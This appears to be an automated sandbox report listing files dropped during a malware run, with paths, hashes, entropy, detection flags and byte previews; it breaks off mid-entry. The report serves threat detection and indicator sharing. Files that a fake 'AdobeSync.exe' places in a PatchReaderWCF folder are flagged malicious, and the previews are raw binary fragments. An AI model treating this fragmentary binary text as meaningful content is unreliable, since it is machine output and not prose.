                                                                                                                                                                                                                                                                                                SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):122218
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\PatchReaderWCF\AXE8SharedExpat.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):168960
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.635989544957891
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:mm3ITKGHS4tcdKwmcOTw1hOqLKpJzadzwxxYBcdgNqbeBTg4vRPzr4zvRjN:mVTxS4tcdKVw1iB8AxrGqG4J
                                                                                                                                                                                                                                                                                                MD5:77610CBDCAC173785E2FB18CCB522574
                                                                                                                                                                                                                                                                                                SHA1:315E7DE9D5DA5C13364D6A5E90C7EFF80A15DA48
                                                                                                                                                                                                                                                                                                SHA-256:40CE54280DBA1A8F029F4A8AFDD19F5D898CE4A221104ED6F9B0F619D54F912F
                                                                                                                                                                                                                                                                                                SHA-512:AA81C82F122D75B3DCA6993A69C051779F9E63E1006E1B3AAB3C6E1A82AF66BBB100CF091A160049C6B041E53ADA6AF71033FC23ED1EA8888F9F3C161FA11206
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r..P.n.P.n.P.n.Yk..D.n.w...S.n.P.o...n.Yk.w.n.Yk...n.Yk..Q.n.NA..Q.n.Yk..Q.n.RichP.n.........PE..L....;.L...........!.................W..............................................1&....@..........................h......Lc..(...................................................................`X..@............................................text...$........................... ..`.rdata..bi.......j..................@..@.data...X#...p.......P..............@....rsrc................f..............@..@.reloc...$.......&...n..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1219488
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.312582930861741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:+heavSigvk0vhkzswHD4/V3OQdnYKYc4wXUyuy1:qP710vezrj4dJYFYUyuy1
                                                                                                                                                                                                                                                                                                MD5:F778E9136AB0DB9DE9802A7043DE50A7
                                                                                                                                                                                                                                                                                                SHA1:850DCA074534A14FDB9ADA6AFACEEA88558764E0
                                                                                                                                                                                                                                                                                                SHA-256:90803A583E9F693DE5E7B8A196832436F6F648B27FB82E55904C256F30CC8B3A
                                                                                                                                                                                                                                                                                                SHA-512:CD6C5C3537F05AD5826D503E38B8E6EF2EAF668616BEC15BA51AD3D81E0337A72779D7CA6AF9E8EBEE12D713891B30C0B73BF34718552BC9F4E7D8909B998156
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................%.l....o...D.....y....p...D.....i.......D.....~......n....k...Rich....................PE..L....oEM.........."..................z............@......................................@.................................T...|.......h.......................d................................... +..@............................................text............................... ..`.rdata..............................@..@.data...........v..................@....rsrc...h............V..............@..@.reloc..:............p..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\PatchReaderWCF\BIB.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):110472
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.411600464209584
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:FeQixAO/A/0VSaGHvP5GeBTEpP2t31VrxrcZ0KOKbfQp:uKO+0VSnKOKbop
                                                                                                                                                                                                                                                                                                MD5:759D71FC9442AB5A9B5749C0F6C0C263
                                                                                                                                                                                                                                                                                                SHA1:07A68C6922D443EB9D6D445DA18AE8A6D92F7AC6
                                                                                                                                                                                                                                                                                                SHA-256:109647F58E7E8386A4C025F2C8175A4D638E5C0E62768953390764010EA22A2E
                                                                                                                                                                                                                                                                                                SHA-512:E3EFE66C76EA81285BA01B1978FDB3E807EB0BF2CFE0373BB6FEF06F2FD7D9DDC3269ACF0D87517CBF9BEA5FA09B2703A03792491DC8265D26B724D7DCA106C7
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............T..T..T..rT..TO.wT..T..tT..T..bT...T._.T..T..T...T..eT..T..sT..T..uT..T..pT..TRich..T................PE..L......L...........!.................j..............................................K.....@.............................j....{..<...................................................................(/..@............................................text............................... ..`.rdata..Js.......t..................@..@.data...,............j..............@....rsrc................t..............@..@.reloc...............|..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\PatchReaderWCF\choirgirl.pdf

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):62969
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.539146899101455
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:wtVMpSzCLmJZriRxBfJJXWT/5F0Oy+loZ:wvuSJhEHfJJGT/5F0v+SZ
                                                                                                                                                                                                                                                                                                MD5:9076AB572C60AAB6B113F4F9108A9CC8
                                                                                                                                                                                                                                                                                                SHA1:1439248640CE9418B5BA13862160DFA00364390B
                                                                                                                                                                                                                                                                                                SHA-256:1E5750FFBDC77FCE17521A2EF5754A998B002A87E9036B1157FC2A63DD91C30D
                                                                                                                                                                                                                                                                                                SHA-512:B42B6162930A5CB9B0FEBC5CE1C6FD5EEF7B02AD041C302820541968EE5FFF1B779D60BDC458B5539B9AEF2F9169F493392A8CD819F435F10D71941A55761287
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:t..T...N.mJ..L..x...o.sF.y.w.SOZD.....giq.[.hU\g\Aa[i..VOBib...[.Lok.G.oRgl.l..SLcn.L...D.o..tO...Z.m.[]......Bo`]FL.[....MV..d.n^.W..j.X.._.n.\.U..crq..`YJRSTd.s\T.R...p....M..kS[.....I.c..pV.v..b.^.q`........M.tpY..b.j.R.i..x..gtO.n.p..Q.\..ug...aR.v[.Gg^.jWa..lhX.QL.fB....Qu.gZ.EK.....Wl.gi.ndP....E\.UHo.O..E..u...i...LF.iqMdJ.W...xgVjkqT..RWu.B].q...W.P.D..V.L..^\ecT...[Vv..F..pp.Ae...q.Ge.f[Msm.J.S.[S.dDGmp\J.vKB....NA.Eiqfu\B.P.M\.Pdo.......Pg..k.wdf...l.e....QG^.E.P......EAB..g.X.s...Y...VbZWe..`.g.......C..Lp.J..r...K.^.fS...k..Y`V.r...O.p.TY.X.R..C...hhR.wqPA..o_hMR..m...nIwiHqCfYq^.dhD...]^.\A.iW.j..dk.cn...]P\ag..cU..xxuAdS].t....S.wU.T.SA.l.yt...N.Q..b...`tyraG.....Za...cC.\n.xa.A..qw.A.K...Yk...p.E....bo.S..Z..ag[fB.L.t..G..w..jw.N.WN.....Q[T.q.rbQZg.Zxg..g..YplESQZQ^wo..d.u._..g._LqVlKcXSS..aOr.`r...f.is..pa...W..s.lVL..b.......ZOSCyu.m..b.rJ..n..u.tr..aB...x[o..Rp..mX.hRIr...R..G..n.V_.S.D.......jsqks.Nh.bRy.Z..f.Nld.`.HU.......G\_.MR..\...y..nJEd.dhh...SIXA..G..J^..xWej

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\PatchReaderWCF\intermixture.zip

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4526833
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.959653744732072
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:9M79mFIVQgIBckuHqM4KVqnl8dAQiORny+fRt:91MQgIBcksVqKdALO9t
                                                                                                                                                                                                                                                                                                MD5:3085505DB1512B966530B829E136BDCF
                                                                                                                                                                                                                                                                                                SHA1:C105A4CB691CC2302878C71BE8D375E4018CDB29
                                                                                                                                                                                                                                                                                                SHA-256:2B85E3A5C3DA072A33AB1372B102EDD4AF6D02D8B74A3E5C949B3F9E628521B7
                                                                                                                                                                                                                                                                                                SHA-512:5A1FD3C4A534C00246C2A7CB9B92775E70FFB02653B2E2F442852466B5558D7B5D88168284F4EA20E528523B2ADD9907EF37077F20DB79EB27285E045CF13A72
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:luC.G..eR.SU..d...\\.m.ZMH....pj]gI..tj.xf.AFD.Xr.tH...J..g.wL.W.myBY..et.\ADg.........JXNvi.`l`.]FD.I..G.d.[...O.UF.p..[.w._..H.bq.Ix...lw].fW...iUri.A.vg.gTZD..f..H.NYcJ`pH.vJi..Pi..i........mwomuu.E.....tjS...FpI..E.Ua..SFl].F.\.^IU....gL]....b..iM`.....O.A.c.K......xt..jwC.`N..Da....mt].C]GA.jL.H.J.....\E..YNg...LK.q....rhg..Wi..MwF..ikT..J...F.h.w..p.GKrDOo...g..uUPU.Zp.]......P.Z.v..fUhmS..WL..o.xC..d.C.YynN.`.XyUHG.`...]eL.m...Z.^.....D..sF..SY.K\..Yn...t.q.W...Yik.v...Fwp...iQ.s..IM.t......Ch..U..JO.V...xtv.b.M.I......uW....K[.i....SK..i.....E.NvaqC........Fe..u.G...dd.T..rf....JLw......W[.H.K.T..\g.oi.....R.La.X..G.o.CBF..ApN..].J.Vk.[.AJ.m....P..h[Vr..Q^h...Ynx...R..Z.j.yo..HZE.....M..F...c....tJ..WK.C....S.S.nF.j.....FJ.G...[q^.M..vMM.....b.Ei.G...o.HW..LD].....thM....J`Kt.L.oL.m.cFn.j.i._..fsR...X.....l.....J.McHim^.x...I.Y.lT.`B....M.].i..Hv.IJv.s.....psL..Y.TY.EN`..ol.^..sl..V......vG...Y...Ni.SOaDCS....v..R.GxE....TtoQ.b...R.YWrXpp..`R^.od.w..i..kt.y...H.xd..Wy.W.w.AO.Vj

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcp90.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):570496
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.5259314477231305
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:BpFE340h3e34GVZQACkIPYhUgiW6QR7t5183Ooc8SHkC2eLgAfO:Bph0h3e3vgzPA83Ooc8SHkC2eLgAfO
                                                                                                                                                                                                                                                                                                MD5:90A32D8E07F7FB3D102EAB1DA28F0723
                                                                                                                                                                                                                                                                                                SHA1:0903911BBB5D00F68BA51895FA898B38A5453DED
                                                                                                                                                                                                                                                                                                SHA-256:004ED24507DC7307CEC1A3732FA57EABF19E918C3E1B54561E6CC01F554C0B77
                                                                                                                                                                                                                                                                                                SHA-512:2C69586D5C5D2B4B5DECF2BF479554C3D0FF5F5A6FBACB01B8583EA8D96D0AE9C850C30A0D43EB2AD1116BE901578D15FE08FCE3E505440C854082C208A79F1A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#%..Mv..Mv..Mv.66v..Mv...v..Mv..Lv:.Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..MvRich..Mv........................PE..L.....i[...........!.....4...p..............P....Hx......................................@..........................P..,....E..<...............................D3...................................%..@............................................text....2.......4.................. ..`.data...t'...P.......8..............@....rsrc................R..............@..@.reloc..HC.......D...V..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcr90.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):653952
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.885961951552677
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                                                                                                                                                                                                                MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                                                                                                                                                                                                                SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                                                                                                                                                                                                                SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
